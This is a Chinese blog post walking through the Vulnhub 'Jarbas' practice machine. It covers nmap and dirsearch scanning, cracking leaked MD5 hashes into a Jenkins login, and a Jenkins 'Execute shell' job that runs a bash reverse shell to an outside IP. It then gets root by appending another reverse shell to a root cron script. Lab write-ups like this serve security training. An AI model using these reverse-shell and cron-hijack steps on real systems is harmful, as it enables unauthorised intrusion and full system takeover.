Jarbas-靶场

已于 2024-03-18 14:19:10 修改
阅读量862 收藏 17
点赞数 30
文章标签: 网络安全
于 2024-03-18 14:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46187131/article/details/136807359
版权

准备阶段

Jarbas介绍

  1. Jarbas是一款基于Linux系统的渗透测试靶场,用于模拟各种安全漏洞和攻击场景。
  2. 通常包含了多个不同难度级别的漏洞,可以通过各种渗透测试技术来尝试攻破这些靶机。

Jarbas安装

  1. Jarbas靶场的下载地址:https://download.vulnhub.com/jarbas/Jarbas.zip
  2. 将压缩包解压,使用虚拟机打开下载的.vmx文件。

信息收集

尝试登录

下载并安装后发现需要用户名和密码,但是并没有给出默认的用户名和密码。

尝试了一些可能出现的账号密码后,并未正确。

查看靶机IP

不能登入靶机,无法通过ipconfig查看靶机IP地址。

更改网络适配器模式:

将靶机的网络模式改成NET模式,共享主机的ip,让靶机和主机在同一网段下。

我的VMware虚拟机的虚拟网络配置,VMnet8是使用的NAT模式,默认子网是192.168.152.0

攻击机(本机)使用ipconfig命令查看

使用nmap扫描

nmap -sV 192.168.152.1/24

-sV:执行版本探测,尝试确定开放端口上运行的服务和版本信息

通过扫描可以判断出,Jarbas靶机IP地址为192.168.152.152,并且开放了4个端口。

nmap -sT -sV -O -p22,80,3306,8080 192.168.152.152

-sT:执行TCP扫描,这是最基本的扫描类型,通过建立完整的TCP连接来检测端口状态

-sV:执行版本探测,尝试确定开放端口上运行的服务和版本信息

-O:对目标主机运行的操作系统类型及其版本

-p:指定扫描的端口范围

nmap -sU -p22,80,3306,8080 192.168.152.152

-sU:执行UDP扫描,用于探测开放的UDP端口

UDP所有的端口都是关闭的,没什么发现

使用dirsearch扫描

python37 dirsearch.py -u http://192.168.152.152/ -x 404

-x:排除指定状态码页面

访问Web,寻找切入点

访问端口

访问网站的80段口,发现是正常的Web界面

访问网站的8080端口,像是一个后台登录界面

访问/access.html

访问后发现有三行编码

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

首先想到的是拿去md5进行解密

解密后得到

tiago:italia99
trindade:marianna
eder:vipsu

看起来像是账号密码

登录后台

使用收集的Jenkins的默认账号密码进行登录

Jenkins:Jenkins

admin:Jenkins

结果均为登录失败

网上收集资料看到

尝试使用md5解密的账号密码进行登录

前两个均为错误

最后一个登陆成功并进入后台

开始渗透

Jenkins是一套著名的内容管理系统,是一个持续的集成工具

收集后台信息

在管理后台看看有没有什么可以利用的地方

发现并没有什么太多的功能

发现新建执行项目的地方,并对其进行利用

新建执行反弹shell任务

新建任务项

信息收集的时候我们知道了这并不是windows系统,而是一个Linux系统。

所以在构建页面-->增加构建步骤选项,选择Execute shell。

并编写反弹shell指令

bash -i >& /dev/tcp/47.99.162.137/6666 0>&1

保存后点击立即构建

这时候查看公网服务器,并以成功接收到shell

系统提权

收集用户信息

whoami查看当前用户为Jenkins

查看IP命令使用不了,证明权限不够

sudo -l查看有哪些权限,发现什么权限也没有

cat /etc/passwd

发现了root用户和一些功能性用户,还有一些没有被分配bash的用户

crontab提权(系统定时任务)

cat /etc/crontab

也有其他查看命令,一个一个去尝试

cat /etc/cron.d

cat /etc/crontab

发现有一个root运行的自动任务脚本

每5分钟运行一次,作用是删除访问日志

cat /etc/script/CleaningScript.sh

因为是以root权限执行的,所以进行利用

echo "bash -i >& /dev/tcp/47.99.162.137/6667 0>&1" >> /etc/script/CleaningScript.sh

在公网服务器监听利用端口,并等待

过了一会,成功拿到shell,并查看权限,为root

查看flag

通过ls发现当前目录下的flag文件,使用cat查看

总结

  1. 首先nmap做端口扫描,发现80和8080两个端口开放
  2. 通过两个端口的Web浏览和目录扫描,发现8080是内容管理系统
  3. 通过目录扫描得知账号密码,并成功登录
  4. 新建一个项目的时候,写进了反弹shell,并拿到初始shell的权限
  5. 收集提权信息
  6. 发现自动任务有root权限运行的,并进行利用,写入shell
  7. 成功拿到root权限,并查看flag

喝水太累
关注
  • 30
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
PyPI 官网下载 | jarbas_hive_mind-0.3.5.tar.gz
02-01
资源来自pypi官网。 资源全名:jarbas_hive_mind-0.3.5.tar.gz
论文研究 - 加强高中地理制图的使用
05-19
以下文章旨在报告制图学在地理上的可执行性的真实经验。 在每一次机会中,这项研究都将目光投向了地图知识所附带的城市化内容,并认为这将引导学生对地理区域和世界现实有所了解。 首先,根据Jarbas Passarinho School高中2年级学生研究的教科书内容,这项工作基于针对性文献综述,通过使用人造卫星(Google Earth)的图像开展实际活动来开展。 在进行此类活动时,已经注意到学生和老师在处理制图时都遇到了一些困难。 但是,建议的练习使内容理解变得容易。 因此,这样的实践活动已经达到了在地理和制图之间进行调解的目的,因为它为学生的学习做出了积极的贡献。
jarbasmedeiros
03-07
你好呀 :waving_hand: 我是Jarbas Medeiros 后端开发人员 :seedling: 我目前正在学习有关Java和Spring Boot的更多信息 :closed_mailbox_with_raised_flag: 如何联系我: 语言和框架 操作系统和工具 关于我
红队渗透靶场Jarbas靶场(超详细)
xf555er的博客
11-26 1181
Jarbas靶场演练, 红队渗透必学靶场
【甄选靶场】Vulnhub百个项目渗透——项目五十四:jarbas-1(类git反弹shell,计划任务提权)
人间体佐菲的博客
01-18 1788
Vulnhub百个项目渗透——项目五十四:jarbas-1(类git反弹shell,计划任务提权)
JARBAS - VulnHub(漏洞靶场渗透测试)
Start C的博客
12-06 303
VulnHub的一个靶场
jarbas靶场渗透笔记
m0_60571990的博客
03-10 350
jarbas靶场渗透笔记
渗透靶场Jarbas
m0_56190544的博客
07-09 492
完整的解析了vulnhub靶场中的Jarbas的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
红队打靶:JARBAS详细打靶思路(vulnhub)
Bossfrank的博客
06-03 1338
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
Vulnhub - Jarbas
qq_46081990的博客
03-16 310
Nmap扫描目标主机,发现开放22、80、8080、3306端口,分别运行OpenSSH 7.4、Apache httpd 2.4.6、Jetty、MariaDB服务,目标操作系统为Linux。因开放3306端口,猜测可能为MySQL账号密码,尝试连接但失败。对于类Github的中间件,比如上个靶场Devguru的Gitea,都可以去寻找有没有命令执行的地方,然后尝试反弹shell。将bash反弹命令追加到后面去,Kali这边nc监听5555端口,等待一段时间,成功收到会话拿到root权限和flag。
渗透测试-Jarbas靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-18 1230
Jarbas靶机渗透1.环境部署2.信息收集3.开始测试80端口8080端口4.提权 1.环境部署 靶机下载地址:点此下载(建议使用迅雷下载) 攻击机:Kali 2019.2 amd64 靶机 : Jarbas靶机 目标:拿下靶机root权限和里面的flag 2.信息收集 使用arp-scan -l进行局域网主机发现 192.168.0.100这个地址是靶机地址 使用nmap进行端口扫描 目录...
Vulnhub -- jarbas靶机渗透
Gh0st_1n_The_Shell的博客
05-31 592
信息收集 扫描开放的端口 进行目录爆破 尝试攻击 提权 提权--信息收集 目标:拿到服务器的Shell 信息收集 配置好后用nmap扫描 kali's ip:192.168.241.131 nmap -sP 192.168.241.131/24 一个个扫描 发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142 扫描开放的端口 nmap -sV 192.168.241.142 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8212
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于SSM+JSP的企业人事管理信息系统毕业设计(源码+录像+说明).rar
05-09
基于SSM+JSP的企业人事管理信息系统毕业设计(源码+录像+说明).rar 【项目技术】 开发语言:Java 框架:ssm+jsp 架构:B/S 数据库:mysql 【演示视频-编号:420】 https://pan.quark.cn/s/b3a97032fae7 【实现功能】 实现了员工基础数据的管理,考勤管理,福利管理,薪资管理,奖惩管理,考核管理,培训管理,招聘管理,公告管理,基础数据管理等功能。
node-v6.12.0-linux-ppc64le.tar.xz
最新发布
05-09
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v6.8.0-linux-ppc64le.tar.xz
05-09
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基于PaddleFL框架的联邦学习医疗影像识别系统源码+GUI界面+说明(高分).zip
05-09
基于PaddleFL框架的联邦学习医疗影像识别系统源码+GUI界面+说明.zip该项目是个人毕设项目源码,评审分达到97分,都经过严格调试,确保可以运行!放心下载使用。该项目资源主要针对计算机相关专业的学生或从业者下载使用,也可作为期末课程设计、课程大作业、毕业设计等。 基于PaddleFL框架的联邦学习医疗影像识别系统源码+GUI界面+说明.zip该项目是个人毕设项目源码,评审分达到97分,都经过严格调试,确保可以运行!放心下载使用。该项目资源主要针对计算机相关专业的学生或从业者下载使用,也可作为期末课程设计、课程大作业、毕业设计等。 基于PaddleFL框架的联邦学习医疗影像识别系统源码+GUI界面+说明.zip该项目是个人毕设项目源码,评审分达到97分,都经过严格调试,确保可以运行!放心下载使用。该项目资源主要针对计算机相关专业的学生或从业者下载使用,也可作为期末课程设计、课程大作业、毕业设计等。 基于PaddleFL框架的联邦学习医疗影像识别系统源码+GUI界面+说明.zip该项目是个人毕设项目源码,评审分达到97分,都经过严格调试,确保可以运行!放心下载使用。该项目资源
node-v6.12.2-linux-s390x.tar.xz
05-09
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v7.2.0-darwin-x64.tar.xz
05-09
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值